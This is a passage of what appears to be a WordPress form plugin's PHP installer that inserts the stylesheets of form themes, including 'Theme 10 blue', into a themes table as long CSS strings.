color-stop(100%, #f58b33)); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #f58b33 0%, #faaa63 20%, #faaa63 80%, #f58b33 100%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #f58b33 0%, #faaa63 20%, #faaa63 80%, #f58b33 100%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #f58b33 0%, #faaa63 20%, #faaa63 80%, #f58b33 100%); /* IE10+ */\r\n	background: linear-gradient(to right, #f58b33 0%, #faaa63 20%, #faaa63 80%, #f58b33 100%); /* W3C */\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 7px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #8D5D35;\r\n	border: 1px solid #F0C579;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 1px 1px #EC8E37;\r\n	font-family: Segoe UI;\r\n	}\r\n.button-reset {\r\n	background: transparent;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 7px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 1px solid #c9c9c9;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_page {\r\n	background: #F7D3BB;\r\n	padding: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n	border-top: 2px solid #FFB471;\r\n}\r\n.wdform_column {\r\n	padding-right: 30px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform-field-section-break2 {\r\n	background: url([SITE_ROOT]/images/01/shadow.png) no-repeat left center;\r\n	background-size: contain;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: #e8a467; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #e8a467 1%, #ffb471 20%, #ffb471 80%, #ffcd72 100%); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(1%, #e8a467), color-stop(20%, #ffb471), color-stop(80%, #ffb471), color-stop(100%, #ffcd72)); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #e8a467 1%, #ffb471 20%, #ffb471 80%, #ffcd72 100%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #e8a467 1%, #ffb471 20%, #ffb471 80%, #ffcd72 100%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #e8a467 1%, #ffb471 20%, #ffb471 80%, #ffcd72 100%); /* IE10+ */\r\n	background: linear-gradient(to right, #e8a467 1%, #ffb471 20%, #ffb471 80%, #ffcd72 100%); /* W3C */\r\n	text-align: left;\r\n	padding: 7px 30px 10px 10px;\r\n	border-top-left-radius: 0px;\r\n	border-top-right-radius: 10px;\r\n	border-bottom-right-radius: 10px;\r\n	border-bottom-left-radius: 0px;\r\n	-moz-box-shadow: inset 51px 0px 8px -50px #636363, 4px 0px 7px 0px rgba(0, 0, 0, 0.23);\r\n	-webkit-box-shadow: inset 51px 0px 8px -50px #636363, 4px 0px 7px 0px rgba(0, 0, 0, 0.23);\r\n	box-shadow: inset 51px 0px 8px -50px #636363, 4px 0px 7px 0px rgba(0, 0, 0, 0.23);\r\nfont-size:18px;\r\n}\r\n\r\n.wdform_section_break {\r\n	margin: 16px 10px 16px 0px;\r\nfont-size:18px;\r\n}\r\n.wdform_section {\r\n	display: table-row;\r\n}\r\nselect {\r\n	border-radius: 7px;\r\n	height: 32px;\r\n	overflow: hidden;\r\n	border: 1px solid #ccc;\r\n	padding: 2px;\r\n	outline: none;\r\n}\r\ninput[type="text"]{\r\n	border-radius: 7px;\r\n	height: 30px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="password"]{\r\n	border-radius: 7px;\r\n	height: 30px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ntextarea {\r\n	border-radius: 7px;\r\n	height: 30px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="text"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\n\r\ninput[type="password"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\n\r\ntextarea:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\n\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 70px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 15px;\r\n	height: 16px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 5px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/01/checkbox.png);\r\n	border-radius: 2px;\r\n	top: 0px;\r\n	left: 2px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/01/date.png) no-repeat left 50% !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 37px;\r\n	height: 30px;\r\n	position: relative;\r\n	left: -35px;\r\n	vertical-align: top;\r\n}\r\n.wdform-calendar-button:focus {\r\n	outline:none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 15px;\r\n	height: 16px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 5px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 10px;\r\n	background: #615F60;\r\n	border-radius: 2px;\r\n	top: 3px;\r\n	left: 3px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	border-top: 1px solid #D8D6D7;\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 7px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n color: #000;\r\n	cursor: pointer;\r\n	background-color: #FFD9B8;\r\n	margin: 1px;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding-top: 5px;\r\n	padding: 5px 30px 0px 30px;\r\n}\r\n.page_active {\r\n	color: #000;\r\n	cursor: pointer;\r\n	background-color: #FFB471;\r\n	margin: 1px;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	padding: 5px 30px 0px 30px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 25px;\r\n	line-height: 25px;\r\n	border-top-left-radius: 17px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #FF983C; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #f6a965 0%, #f6a965 67%, #ff983c 100%); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #f6a965), color-stop(67%, #f6a965), color-stop(100%, #ff983c)); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #f6a965 0%, #f6a965 67%, #ff983c 100%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #f6a965 0%, #f6a965 67%, #ff983c 100%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #f6a965 0%, #f6a965 67%, #ff983c 100%); /* IE10+ */\r\n	background: linear-gradient(to right, #f6a965 0%, #f6a965 67%, #ff983c 100%); /* W3C */\r\n	vertical-align: middle;\r\n}\r\n.page_percentage_deactive {\r\n	height: 25px;\r\n	line-height: 25px;\r\n	background-color: #FFD9B8;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n	border-top-left-radius: 17px;\r\n	border-top-right-radius: 17px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_page_navigation span:first-child {\r\n	border-top-left-radius: 17px;\r\n}\r\n.wdform_percentage_arrow {\r\ndisplay: inline-block;\r\nwidth: 21px;\r\nheight: 25px;\r\nbackground-color: #FF983D;\r\nposition: relative;\r\nleft: -15px;\r\nz-index: 0;\r\nvertical-align: middle;\r\n-moz-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-10deg) skewY(0deg);\r\n-webkit-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n-o-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-10deg) skewY(0deg);\r\n-ms-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-10deg) skewY(0deg);\r\ntransform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-10deg) skewY(0deg);\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px -14px 3px 9px;\r\n	color: #FFFFFF;\r\n	font-weight: bold;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 25px;\r\n	height: 25px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform_button button {\r\n	background: #e4e4e4; /* Old browsers */\r\n	background: -moz-linear-gradient(top, #e4e4e4 0%, #cccccc 100%); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, left bottom, color-stop(0%, #e4e4e4), color-stop(100%, #cccccc)); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(top, #e4e4e4 0%, #cccccc 100%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(top, #e4e4e4 0%, #cccccc 100%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(top, #e4e4e4 0%, #cccccc 100%); /* IE10+ */\r\n	background: linear-gradient(to bottom, #e4e4e4 0%, #cccccc 100%); /* W3C */\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 7px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #787878;\r\n	border: 0px;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\', 0)');
    $wpdb->query('INSERT INTO `' . $wpdb->prefix . 'formmaker_themes` (`title`, `css`, `default`) VALUES(\'Theme 10 blue\', \'.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #D1E0F0;\r\nborder: 1px solid #075DA4;\r\nmargin-bottom: 10px;\r\ncolor: #075DA4;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n	content: url([SITE_ROOT]/images/01/02/next_hoverbg.png) url([SITE_ROOT]/images/01/02/previous_hover.png) url([SITE_ROOT]/images/01/02/next_hover.png);\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 3px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #004D8E !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #004D8E !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #FFB471 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #004D8E !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #FFB471 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #004D8E !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\nui-state-hover {\r\n	background: #FFB471 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff;\r\n	margin: 7px 0px;\r\n}\r\na.ui-slider-handle {\r\n	border-radius: 10px;\r\n	border: 2px solid #fff;\r\n	background: #A4A4A4;\r\n}\r\n.ui-slider-horizontal .ui-slider-handle {\r\n	top: -8px !important;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #A4A4A4 !important;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 7px;\r\n	padding: 2px 0px 2px 2px;\r\n	font-size: 13px;\r\n	height: 26px;\r\n	line-height: 26px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 28px;\r\n	width: 32px;\r\n	background: url([SITE_ROOT]/images/01/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 1px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text] {\r\n	margin: 0px;\r\n}\r\ninput[type=password] {\r\n	margin: 0px;\r\n}\r\ninput[type=url] {\r\n	margin: 0px;\r\n}\r\ninput[type=email] {\r\n	margin: 0px;\r\n}\r\ninput.text {\r\n	margin: 0px;\r\n}\r\ninput.title {\r\n	margin: 0px;\r\n}\r\ntextarea {\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-page-and-images:after {\r\n	width: 100%;\r\n	content: "";\r\n	display: block;\r\n	height: 17px;\r\n	background: url([SITE_ROOT]/images/01/0.png) no-repeat center center;\r\n	position: relative;\r\n	background-size: cover;\r\n	top: -17px;\r\n	left: -50px;\r\n	padding-left: 100px;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 7px;\r\n	height: 27px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n//text-overflow: ellipsis;\r\n}\r\n.file-picker {\r\n	width: 38px;\r\n	height: 34px;\r\n	background: url([SITE_ROOT]/images/01/upload.png);\r\n	display: inline-block;\r\n}\r\ndiv.wdform-page-button {\r\n	color: #414141;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 36px;\r\n	line-height: 36px;\r\n	background: url([SITE_ROOT]/images/01/nextbg.png) no-repeat right center;\r\n	-webkit-background-size: cover;\r\n	-moz-background-size: cover;\r\n	-o-background-size: cover;\r\n	background-size: cover;\r\n	border-style: solid;\r\n	padding: 0px 15px;\r\n	vertical-align: middle;\r\n	border-color: transparent;\r\n}\r\ndiv.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/01/02/next_hoverbg.png) no-repeat right center;\r\n	-webkit-background-size: cover;\r\n	-moz-background-size: cover;\r\n	-o-background-size: cover;\r\n	background-size: cover;\r\ncolor:#fff;\r\n}\r\n.next-page div.wdform-page-button {\r\n	border-width: 0px 18px 0px 0px;\r\n	-moz-border-image: url([SITE_ROOT]/images/01/next.png) 0 36 0 0 stretch;\r\n	-webkit-border-image: url([SITE_ROOT]/images/01/next.png) 0 36 0 0 stretch;\r\n	-o-border-image: url([SITE_ROOT]/images/01/next.png) 0 36 0 0 stretch;\r\n	border-image: url([SITE_ROOT]/images/01/next.png) 0 36 0 0 stretch;\r\n	box-shadow: inset 51px 0px 8px -50px #636363;\r\n}\r\n.next-page div.wdform-page-button:hover {\r\n	-moz-border-image: url([SITE_ROOT]/images/01/02/next_hover.png) 0 36 0 0 stretch;\r\n	-webkit-border-image: url([SITE_ROOT]/images/01/02/next_hover.png) 0 36 0 0 stretch;\r\n	-o-border-image: url([SITE_ROOT]/images/01/02/next_hover.png) 0 36 0 0 stretch;\r\n	border-image: url([SITE_ROOT]/images/01/02/next_hover.png) 0 36 0 0 stretch;\r\n}\r\n.next-page:before {\r\n	content: "";\r\n	height: 56px;\r\n	vertical-align: middle;\r\n	background: url([SITE_ROOT]/images/01/shadow.png) no-repeat left center;\r\n	background-size: contain;\r\n	width: 7px;\r\n	display: inline-block;\r\n	position: relative;\r\n	left: 7px;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	border-width: 0px 0px 0px 18px;\r\n	-moz-border-image: url([SITE_ROOT]/images/01/previous.png) 0 0 0 36 stretch;\r\n	-webkit-border-image: url([SITE_ROOT]/images/01/previous.png) 0 0 0 36 stretch;\r\n	-o-border-image: url([SITE_ROOT]/images/01/previous.png) 0 0 0 36 stretch;\r\n	border-image: url([SITE_ROOT]/images/01/previous.png) 0 0 0 36 stretch;\r\n	box-shadow: inset -51px 0px 8px -50px #636363;\r\n}\r\n.previous-page div.wdform-page-button:hover {\r\n	-moz-border-image: url([SITE_ROOT]/images/01/02/previous_hover.png) 0 0 0 36 stretch;\r\n	-webkit-border-image: url([SITE_ROOT]/images/01/02/previous_hover.png) 0 0 0 36 stretch;\r\n	-o-border-image: url([SITE_ROOT]/images/01/02/previous_hover.png) 0 0 0 36 stretch;\r\n	border-image: url([SITE_ROOT]/images/01/02/previous_hover.png) 0 0 0 36 stretch;\r\n}\r\n.previous-page:after {\r\n	content: "";\r\n	height: 56px;\r\n	vertical-align: middle;\r\n	background: url([SITE_ROOT]/images/01/shadow1.png) no-repeat right center;\r\n	background-size: contain;\r\n	width: 7px;\r\n	display: inline-block;\r\n	position: relative;\r\n	left: -7px;\r\n}\r\n.button-submit {\r\nbackground: #035192 ;\r\nbackground: -moz-linear-gradient(left, #035192 0%, #0860A9 20%, #0860A9 80%, #035192 100%);\r\nbackground: -webkit-gradient(linear, left top, right top, color-stop(0%, #035192 ), color-stop(20%, #0860A9 ), color-stop(80%, #0860A9 ), color-stop(100%, #035192 ));\r\nbackground: -webkit-linear-gradient(left, #035192 0%, #0860A9 20%, #0860A9 80%, #035192 100%);\r\nbackground: -o-linear-gradient(left, #035192 0%, #0860A9 20%, #0860A9 80%, #035192 100%);\r\nbackground: -ms-linear-gradient(left, #035192 0%, #0860A9 20%, #0860A9 80%, #035192 100%);\r\nbackground: linear-gradient(to right, #035192 0%, #0860A9 20%, #0860A9 80%, #035192 100%);\r\ncursor: pointer;\r\nfont-size: 17px;\r\nborder-radius: 7px;\r\nmin-width: 80px;\r\nmin-height: 34px;\r\ncolor: #fff;\r\nborder: 1px solid #3A8BCF;\r\nmargin: 5px;\r\nbox-shadow: 0px 0px 1px 1px #063A66;\r\nfont-family: Segoe UI;\r\n	}\r\n.button-reset {\r\n	background: transparent;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 7px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 1px solid #c9c9c9;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_page {\r\n	background: #D1E0F0;\r\n	padding: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n	border-top: 1px solid #004D8E;\r\n}\r\n.wdform_column {\r\n	padding-right: 30px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform-field-section-break2 {\r\n	background: url([SITE_ROOT]/images/01/shadow.png) no-repeat left center;\r\n	background-size: contain;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: #0559A0 ; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #00457F 1%, #0559A0 20%, #0E6AB8 80%, #006CC7 100%); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(1%, #00457F ), color-stop(20%, #0559A0 ), color-stop(80%, #0E6AB8 ), color-stop(100%, #006CC7 )); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #00457F 1%, #0559A0 20%, #0E6AB8 80%, #006CC7 100%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #00457F 1%, #0559A0 20%, #0E6AB8 80%, #006CC7 100%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #00457F 1%, #0559A0 20%, #0E6AB8 80%, #006CC7 100%); /* IE10+ */\r\nbackground: linear-gradient(to right, #00457F 1%, #0559A0 20%, #0E6AB8 80%, #006CC7 100%); /* W3C */\r\n	text-align: left;\r\n	padding: 7px 30px 10px 10px;\r\n	border-top-left-radius: 0px;\r\n	border-top-right-radius: 10px;\r\n	border-bottom-right-radius: 10px;\r\n	border-bottom-left-radius: 0px;\r\n	-moz-box-shadow: inset 51px 0px 8px -50px #636363, 4px 0px 7px 0px rgba(0, 0, 0, 0.23);\r\n	-webkit-box-shadow: inset 51px 0px 8px -50px #636363, 4px 0px 7px 0px rgba(0, 0, 0, 0.23);\r\n	box-shadow: inset 51px 0px 8px -50px #636363, 4px 0px 7px 0px rgba(0, 0, 0, 0.23);\r\ncolor:#fff;\r\nfont-size:18px;\r\n}\r\n\r\n.wdform_section_break {\r\n	margin: 